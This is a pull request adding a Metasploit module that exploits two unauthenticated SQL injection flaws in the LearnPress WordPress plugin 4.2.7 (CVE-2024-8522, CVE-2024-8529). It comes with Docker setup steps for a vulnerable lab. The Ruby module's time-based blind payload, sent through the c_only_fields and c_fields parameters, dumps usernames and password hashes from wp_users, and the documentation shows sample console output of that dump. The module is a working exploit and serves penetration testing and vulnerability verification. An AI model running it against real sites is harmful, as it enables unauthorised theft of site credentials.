### PR TITLE
Add LearnPress SQLi module (CVE-2024-8522, CVE-2024-8529)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/wp_learnpress_c_fields_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_learnpress_c_fields_sqli.md
@@ -1,0 +1,157 @@
+## Vulnerable Application
+
+The vulnerability affects the **LearnPress** plugin, version **4.2.7** and below,
+allowing unauthenticated SQL injection via the `c_only_fields` and `c_fields` parameters.
+
+### Pre-requisites:
+- **Docker** and **Docker Compose** installed on your system.
+
+### Setup Instructions:
+
+1. **Download the Docker Compose file**:
+   - Below is the content of the **docker-compose.yml** file to set up WordPress with the vulnerable LearnPress plugin and a MySQL database.
+
+```yaml
+version: '3.1'
+
+services:
+  wordpress:
+    image: wordpress:latest
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: chocapikk
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    mem_limit: 512m
+    volumes:
+      - wordpress:/var/www/html
+      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: chocapikk
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+```
+
+2. **Add custom PHP configuration** (for plugin uploads):
+   - Create a file named `custom.ini` in the same directory as `docker-compose.yml` with the following content:
+
+```bash
+upload_max_filesize = 64M
+post_max_size = 64M
+```
+
+This increases the file size limits for uploading the LearnPress plugin.
+
+3. **Start the Docker environment**:
+   - In the directory where you saved the `docker-compose.yml` file, run the following command to start the services:
+
+```bash
+docker-compose up -d
+```
+
+4. **Install LearnPress Plugin**:
+   - Download the vulnerable version of LearnPress:
+
+```bash
+wget https://downloads.wordpress.org/plugin/learnpress.4.2.7.zip
+```
+
+   - Install the plugin in your running WordPress instance:
+     - Extract the plugin files and copy them to your WordPress container:
+
+```bash
+unzip learnpress.4.2.7.zip
+docker cp learnpress wordpress:/var/www/html/wp-content/plugins/
+```
+
+   - Navigate to `http://localhost:5555/wp-admin` in your browser and activate the **LearnPress** plugin in the WordPress admin panel.
+
+## Verification Steps
+
+1. **Set up WordPress** with the vulnerable **LearnPress 4.2.7** plugin.
+2. **Start Metasploit** using the command `msfconsole`.
+3. Use the correct module for the vulnerability:
+
+```bash
+use auxiliary/scanner/http/wp_learnpress_c_fields_sqli
+```
+
+4. Set the target's IP and URI:
+
+```bash
+set RHOSTS <target_ip>
+set TARGETURI /
+```
+
+5. **Run the module**:
+
+```bash
+run
+```
+
+6. **Verify the SQL Injection**:
+   - After running the module, the SQL injection payload will attempt to retrieve or manipulate data from the WordPress database.
+
+## Options
+
+### COUNT
+This option specifies the number of rows to retrieve from the database during the SQL injection attack.
+For example, setting `COUNT` to 5 will retrieve 5 rows from the `wp_users` table.
+
+## Scenarios
+
+The following scenario demonstrates an SQL injection attack against a WordPress installation running
+**LearnPress <= 4.2.7** on a Docker environment with MySQL.
+
+### Step-by-step Scenario
+
+```bash
+msf6 auxiliary(scanner/http/wp_learnpress_c_fields_sqli) > run http://127.0.0.1:5555
+
+[*] Performing SQL injection via the 'c_only_fields' parameter...
+[*] {SQLi} Executing (select group_concat(LKzEL) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) LKzEL from wp_users limit 1) ssrDlly)
+[*] {SQLi} Time-based injection: expecting output of length 44
+[+] Dumped user data:
+wp_users
+========
+
+    user_login  user_pass
+    ----------  ---------
+    chocapikk   $P$BPdY0XccQT2nvSXE8bjsn1CERoF7eJ.
+
+[+] Loot saved to: /home/chocapikk/.msf4/loot/20240920003917_default_127.0.0.1_wordpress.users_803563.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wp_learnpress_c_fields_sqli) > set action CVE-2024-8529
+action => CVE-2024-8529
+msf6 auxiliary(scanner/http/wp_learnpress_c_fields_sqli) > run http://127.0.0.1:5555
+
+[*] Performing SQL injection via the 'c_fields' parameter...
+[*] {SQLi} Executing (select group_concat(hhtd) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) hhtd from wp_users limit 1) mqRlJXbdH)
+[*] {SQLi} Time-based injection: expecting output of length 44
+[+] Dumped user data:
+wp_users
+========
+
+    user_login  user_pass
+    ----------  ---------
+    chocapikk   $P$BPdY0XccQT2nvSXE8bjsn1CERoF7eJ.
+
+[+] Loot saved to: /home/chocapikk/.msf4/loot/20240920004105_default_127.0.0.1_wordpress.users_099358.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/wp_learnpress_c_fields_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_learnpress_c_fields_sqli.rb
@@ -1,0 +1,118 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::SQLi
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529)',
+        'Description' => %q{
+          The LearnPress WordPress LMS Plugin up to version 4.2.7 is vulnerable to SQL injection via
+          the 'c_only_fields' and 'c_fields' parameters. This allows unauthenticated attackers to exploit blind SQL injections
+          and extract sensitive information.
+        },
+        'Author' => [
+          'abrahack',          # Vulnerability Discovery
+          'Valentin Lobstein'  # Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-8522'],
+          ['CVE', '2024-8529'],
+          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-427-unauthenticated-sql-injection-via-c-only-fields'],
+          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-427-unauthenticated-sql-injection-via-c-fields']
+        ],
+        'Actions' => [
+          ['CVE-2024-8522', { 'Description' => 'SQL Injection via c_only_fields parameter' }],
+          ['CVE-2024-8529', { 'Description' => 'SQL Injection via c_fields parameter' }]
+        ],
+        'DefaultAction' => 'CVE-2024-8522',
+        'DefaultOptions' => { 'SqliDelay' => '2', 'VERBOSE' => true },
+        'DisclosureDate' => '2024-09-11',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of rows to retrieve', 1]),
+    ]
+  end
+
+  def run_host(ip)
+    sqli_param = action.name.downcase.include?('cve-2024-8522') ? 'c_only_fields' : 'c_fields'
+    description = action.name.downcase.include?('cve-2024-8522') ? 'CVE-2024-8522' : 'CVE-2024-8529'
+
+    print_status("Performing SQL injection for #{description} via the '#{sqli_param}' parameter...")
+
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
+      random_negative_number = -Rex::Text.rand_text_numeric(2).to_i
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'vars_get' => {
+          'rest_route' => '/learnpress/v1/courses',
+          sqli_param => "IF(COUNT(*)!=#{random_negative_number},(#{payload}),0)"
+        }
+      })
+      fail_with(Failure::Unreachable, 'Connection failed') unless res
+    end
+
+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable or delay is too short.') unless @sqli.test_vulnerable
+
+    columns = ['user_login', 'user_pass']
+    data = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
+
+    table = Rex::Text::Table.new(
+      'Header' => 'wp_users',
+      'Indent' => 4,
+      'Columns' => columns
+    )
+
+    loot_data = ''
+
+    data.each do |user|
+      table << user
+      loot_data << "Username: #{user[0]}, Password Hash: #{user[1]}\n"
+
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :nonreplayable_hash,
+        jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]),
+        private_data: user[1],
+        service_name: 'WordPress',
+        address: ip,
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+    end
+
+    print_good('Dumped user data:')
+    print_line(table.to_s)
+
+    loot_path = store_loot(
+      'wordpress.users',
+      'text/plain',
+      ip,
+      loot_data,
+      'wp_users.txt',
+      'WordPress Usernames and Password Hashes'
+    )
+
+    print_good("Loot saved to: #{loot_path}")
+  end
+end

--- a/modules/auxiliary/scanner/http/wp_learnpress_c_fields_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_learnpress_c_fields_sqli.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
     ]
   end
 
-  def run_host(ip)
+  def run_host(_ip)
     sqli_param = action.name.downcase.include?('cve-2024-8522') ? 'c_only_fields' : 'c_fields'
     description = action.name.downcase.include?('cve-2024-8522') ? 'CVE-2024-8522' : 'CVE-2024-8529'
 
@@ -68,17 +68,10 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::Unreachable, 'Connection failed') unless res
     end
 
+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable or delay is too short.') unless @sqli.test_vulnerable
+    print_good('Target is vulnerable to SQLi!')
+
     wordpress_sqli_initialize(@sqli)
-
-    unless @sqli.test_vulnerable
-      fail_with(Failure::NotVulnerable, 'Target is not vulnerable or delay is too short.')
-    end
-
-    table_prefix = wordpress_sqli_identify_table_prefix
-    unless table_prefix
-      fail_with(Failure::NotFound, 'Failed to identify the WordPress table prefix.')
-    end
-
-    wordpress_sqli_get_users_credentials(table_prefix, ip, datastore['COUNT'])
+    wordpress_sqli_get_users_credentials(datastore['COUNT'])
   end
 end


### PR DESCRIPTION
Hello Metasploit Team,

I am submitting a new auxiliary module that exploits two unauthenticated SQL injection vulnerabilities in the **LearnPress** WordPress LMS Plugin (version <= 4.2.7). These vulnerabilities allow attackers to perform blind SQL injection via the `c_only_fields` and `c_fields` parameters.

### Summary of changes:

- **Module location**: `auxiliary/scanner/http/wp_learnpress_c_fields_sqli`
- **Vulnerabilities targeted**: 
  - **CVE-2024-8522**: SQL injection via the `c_only_fields` parameter.
  - **CVE-2024-8529**: SQL injection via the `c_fields` parameter.
- **Docker environment**: Instructions are included for setting up a vulnerable WordPress instance with LearnPress using Docker. This setup allows for easy testing of the exploit.
- **Metasploit module**: The module allows users to select between the two vulnerabilities (`c_only_fields` for CVE-2024-8522 and `c_fields` for CVE-2024-8529) and includes options such as specifying the number of rows to retrieve (`COUNT`).

### Usage and Verification:

The module has been tested using a Docker environment running WordPress with LearnPress 4.2.7 installed. The setup instructions and verification steps are outlined in the documentation file.

Let me know if you need any further changes or if there are any issues during the review.